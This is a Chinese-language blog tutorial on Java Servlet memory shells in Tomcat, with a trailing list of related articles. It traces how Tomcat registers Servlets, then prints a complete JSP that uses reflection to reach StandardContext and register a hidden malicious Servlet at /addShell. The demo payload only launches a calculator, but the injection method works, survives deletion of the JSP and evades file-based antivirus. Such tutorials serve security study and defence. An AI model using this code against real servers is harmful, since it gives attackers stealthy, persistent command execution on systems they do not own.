Java安全-Servlet内存马

内存马简介

内存马是指将恶意代码注入到内存中,达到无文件落地的效果,使得被攻击方难以察觉。由于是无文件的形式,可以绕过部分基于文件检测的杀软。而 Servlet 内存马是基于 Java Servlet 技术,动态将恶意代码注入到 Tomcat 内存中的一种技术。

Servlet 搭建

选择"新建项目",勾选"Web 应用程序",然后点"下一步"。

这里需要修改为自己的 Java 版本,勾选 Servlet,完成创建。

创建好后默认是用注解的形式注册 Servlet,不过不影响。

找到 pom.xml,添加下面这段,并下载源代码用于后续断点分析。

复制代码
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <!-- 版本按照本地Tomcat版本来 -->
    <version>9.0.84</version>
</dependency>

如果无法下载源代码,在项目根路径运行下面命令,然后再下载。

复制代码
mvn dependency:resolve -Dclassifier=sources

运行 Tomcat,能访问这个页面就说明程序没问题。

Tomcat 中 Servlet 的注册流程

双击 Shift,搜索 ContextConfig。

找到 configureContext 方法,打个断点,开始调试。

观察下面的参数值,可以看到这里传入了三个 Servlet,前两个是系统默认的,第三个是我们自己定义的。

然后继续往下调试,走到这个 for 循环,这里遍历最开始获取的 Servlet,创建了一个包装器来包装 Servlet 的基本信息。

往下走就是对 Servlet 的一些基本赋值。

继续往下调试,这里用 context.addChild(wrapper) 把包装好的 Servlet 加到 context 里,同时对 servletMappings 添加映射关系。

到这里,其实只要控制好 addChild 和 addServletMappingDecoded 就能动态注册 Servlet,但问题是 context 是什么?

我们回到调试界面重新调试,走到这里可以看到,context 其实是 StandardContext,它下面还有个 ApplicationContext,按用户传入的流程应该是 ApplicationContext.context -> StandardContext.context。

这样反向推导可能会让各位彦祖很迷惑,其实可以直接在我们自定义的 Servlet 里下断点,然后浏览器访问这个 Servlet 触发调试。

在表达式这里写入 request.getServletContext(),可以看到返回的是 ApplicationContext.context -> StandardContext.context,正好对应上面说的。

Servlet 内存马原理与实现

假设服务器能上传 JSP,我们就在 Web 目录里建个注册内存马的 JSP 文件,完整代码如下:

java 复制代码
<%@ page import="java.io.IOException" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page language="java" pageEncoding="utf-8" contentType="text/html; charset=UTF-8"%>

<%!
public class ShellServlet extends HttpServlet{
    @Override
    protected void doGet(HttpServletRequest request,HttpServletResponse response) throws IOException {
        Runtime.getRuntime().exec("calc");

    }
}
%>

<%

    request.setCharacterEncoding("utf-8");
    response.setCharacterEncoding("utf-8");
    response.setContentType("text/html;charset=UTF-8");
    out.print("你充Q币吗?");
    // 从请求对象获取 ApplicationContext
    ServletContext servletContext = request.getServletContext();
    Field applicationContextField = servletContext.getClass().getDeclaredField("context");
    applicationContextField.setAccessible(true);
    ApplicationContext appContext  = (ApplicationContext)applicationContextField.get(servletContext);

    // 从ApplicationContext中获取StandardContext
    Field standardcontextField = appContext.getClass().getDeclaredField("context");
    standardcontextField.setAccessible(true);
    StandardContext standardcontext = (StandardContext)standardcontextField.get(appContext);

    // 注册恶意Servlet
    Wrapper wrapper = standardcontext.createWrapper();
    // 传入Servlet名字
    wrapper.setName("ShellServlet");
    // 传入Servlet映射类名+实例化类
    wrapper.setServletClass(ShellServlet.class.getName());
    wrapper.setServlet(new ShellServlet());
    // 将包装器添加到context
    standardcontext.addChild(wrapper);
    // 添加路由Servlet映射关系
    standardcontext.addServletMappingDecoded("/addShell",wrapper.getName());
%>

把写好的内存马放到 Web 目录后,直接访问恶意 JSP,完成注册 Servlet。

接下来访问我们注册的恶意 Servlet 路径 /addShell,成功弹出计算器。

由于恶意 Servlet 已经注入到 Tomcat 中,即使删掉 shell.jsp,恶意代码依旧存在,除非重启 Tomcat 服务。

相关推荐
玉笥寻珍1 分钟前
企业级小程序APP用户数据查询系统安全脆弱性分析及纵深防御体系构建
安全·系统安全
曼汐 .2 分钟前
Linux安全第三章-系统安全及应用
安全·系统安全
吱吱企业安全通讯软件10 分钟前
保密行业工作沟通安全:吱吱软件的“四重防泄露”设计
网络·安全·信息与通信
视觉&物联智能16 分钟前
【杂谈】-智领安全新篇:人工智能驱动现代物理安全防护体系
人工智能·深度学习·安全·aigc·agi
爬虫程序猿30 分钟前
如何利用 Java 爬虫根据 ID 获取某手商品详情:实战指南
java·开发语言·爬虫
SSSYUsssyu43 分钟前
Java NIO(New I/O)
java·开发语言·nio
从零开始学习人工智能44 分钟前
深入解析异步编程:Java NIO、Python `async/await` 与 C# `async/await` 的对比
java·python·nio
Blossom.1181 小时前
量子通信技术:原理、应用与未来展望
大数据·人工智能·深度学习·安全·机器学习·计算机视觉·量子计算
暮乘白帝过重山1 小时前
JVM之GC常见的垃圾回收器
java·jvm·算法
我最厉害。,。1 小时前
JS 应用&安全案例&泄漏云配置&接口调试&代码逻辑&框架漏洞自检
开发语言·javascript·安全